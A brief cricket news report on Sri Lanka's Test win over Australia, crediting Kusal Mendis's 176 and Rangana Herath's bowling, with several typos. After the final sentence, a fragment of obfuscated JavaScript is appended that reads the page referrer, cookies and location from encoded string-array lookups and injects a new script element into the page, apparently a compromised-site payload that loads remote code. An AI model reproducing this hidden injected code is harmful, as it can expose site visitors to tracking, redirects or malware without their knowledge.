Astonishing fightback by the hosts produced a thrilling contest in a rain affected test match.

It took 17 years for Sri Lanka to produce a Test Victory against the Aussies. Overall it was just the second time in their head to head clash.
But it has to be said that the long wait was worth it. One of the finest comebackas you will ever witness.

Sri Lanka were down and out from the contest but the sheer brilliance of Kusal Mendis turned things around and his fighting knock of 176 runs put Sri Lanka in a strong position. Chasing 268 runs, the Australian side was playing with intent and looked to get as close as possible. But the magical fingers of Rangana Herath applied breaks to the scoring and got wickets at regular intervals.

The Aussies were bowled out on 161 runs. Rangana bagged half the side with some good consistent bowling. Steve Smith was the top scorer with 55 runs but he fell to a top class delivery by Herath. Sri Lanka had to fight hard at the end as above 20 overas were just defended by Peter Neville and Steven OaKeefe. No runs were scored in these overas.

The patience was over when an unusual bowling change by Mathews to bring in Silva brought the break through and Rangana wrapped up things for the hosts.

The next test Match will be played from 4th August at Galle. t(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
